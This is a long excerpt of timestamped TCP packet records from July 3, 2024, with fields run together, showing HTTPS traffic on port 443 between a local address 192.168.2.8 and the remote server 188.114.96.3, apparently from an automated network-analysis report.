                          Jul 3, 2024 18:08:12.936381102 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.936409950 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.936446905 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.937350988 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937367916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937431097 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.937438965 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937553883 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937572956 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937606096 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.937613964 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.937633991 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.938493013 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938508034 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938565969 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.938572884 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938582897 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938601971 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938632965 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.938641071 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.938661098 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.939487934 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939503908 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939563036 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.939569950 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939686060 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939703941 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939738989 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.939750910 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.939764977 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.940485954 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940500975 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940567970 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.940576077 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940633059 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940653086 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940691948 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.940700054 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.940711975 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.941551924 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941575050 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941631079 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941633940 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.941644907 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941673994 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941684008 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.941694975 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.941740990 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.942068100 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945127010 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945147038 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945187092 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945194960 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945218086 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945236921 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945753098 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945768118 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945807934 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945815086 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.945841074 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.945861101 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.946223974 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946233034 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946300030 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.946306944 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946352959 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.946705103 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946721077 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946774960 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.946783066 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.946827888 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.947004080 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947020054 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947073936 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.947082996 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947132111 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.947660923 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947701931 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947732925 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.947740078 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.947766066 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.947786093 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.950810909 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.950830936 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.950933933 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.950942993 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.950984955 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.952972889 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.952990055 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.953087091 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:12.953094959 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:12.953138113 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.036032915 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036060095 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036174059 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.036206961 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036240101 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.036710978 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036726952 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036788940 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.036801100 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.036839962 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.037121058 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037134886 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037190914 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.037203074 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037236929 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.037627935 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037647963 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037718058 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.037728071 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.037761927 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.038146019 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.038161039 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.038218975 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.038228989 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.038275957 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.040810108 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.040837049 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.040914059 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.040931940 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.040971041 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.041557074 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.041573048 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.041627884 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.041640997 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.041681051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.043900013 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.043924093 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.043978930 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.043987989 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.044029951 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.126796007 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.126821995 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.126914024 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.126949072 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.126998901 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.127785921 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.127804995 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.127868891 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.127876997 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.127919912 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.128348112 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128362894 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128427982 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.128434896 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128478050 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.128671885 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128688097 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128748894 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.128760099 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.128808022 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.129525900 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129542112 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129611969 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.129616022 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129630089 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129648924 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129692078 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.129700899 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.129714966 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.129740000 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.132570028 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.132586002 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.132656097 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.132663012 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.132705927 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.134691000 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.134707928 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.134778023 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.134784937 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.134825945 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.217899084 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.217926025 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218086004 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.218110085 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218153954 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.218230963 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218250036 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218314886 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.218323946 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218381882 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.218764067 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218780041 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218833923 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.218843937 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.218884945 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.219326019 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219345093 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219399929 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.219415903 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219454050 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.219867945 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219892979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219959974 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.219968081 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.219993114 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.220005035 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.220016956 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.220036983 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.220053911 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.220061064 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.220087051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.220118046 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.223372936 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.223392963 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.223480940 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.223500013 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.223541021 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.225691080 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.225723028 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.225765944 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.225780010 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.225800991 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.225824118 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.308578014 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.308598995 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.308700085 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.308733940 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.308779955 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.309155941 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309173107 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309221983 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.309230089 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309272051 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.309676886 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309694052 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309756994 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.309765100 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.309803009 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.310343027 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.310359001 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.310412884 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.310420990 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.310461044 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.310930967 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.310964108 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.310998917 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.311006069 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.311036110 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.311047077 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.311420918 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.311435938 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.311492920 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.311501026 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.311542034 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.314316988 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.314333916 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.314398050 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.314404964 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.314444065 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.316411972 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.316430092 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.316500902 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.316509008 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.316553116 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.399668932 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.399693012 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.399770021 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.399790049 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.399831057 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.400105000 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400122881 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400172949 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.400182009 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400217056 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.400489092 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400505066 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400558949 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.400568008 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.400607109 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.401099920 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401124001 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401187897 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.401196003 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401236057 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.401706934 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401721001 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401768923 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.401774883 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.401813984 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.402076006 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.402091980 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.402148008 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.402156115 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.402194977 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.405164003 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.405204058 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.405249119 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.405256987 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.405299902 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.407126904 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.407145977 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.407207966 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.407216072 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.407263994 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.490252972 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490286112 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490456104 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.490468979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490582943 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.490751982 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490772009 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490915060 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.490922928 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.490974903 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.491404057 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.491425037 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.491473913 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.491482019 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.491507053 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.491537094 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.491946936 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.491976976 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.492027044 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.492033005 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.492067099 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.492075920 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.492573977 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.492594004 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.492638111 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.492645979 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.492669106 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.492693901 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.493093967 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.493117094 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.493171930 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.493180037 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.493220091 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.495980024 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.496001005 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.496049881 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.496056080 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.496078968 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.496103048 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.498162985 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.498183966 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.498258114 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.498265982 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.498306036 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.581201077 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.581228971 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.581406116 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.581423998 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.581515074 CEST49707443192.168.2.8188.114.96.3
                          Jul 3, 2024 18:08:13.582034111 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582056046 CEST44349707188.114.96.3192.168.2.8
                          Jul 3, 2024 18:08:13.582115889 CEST49707443192.168.2.8188.114.96.3
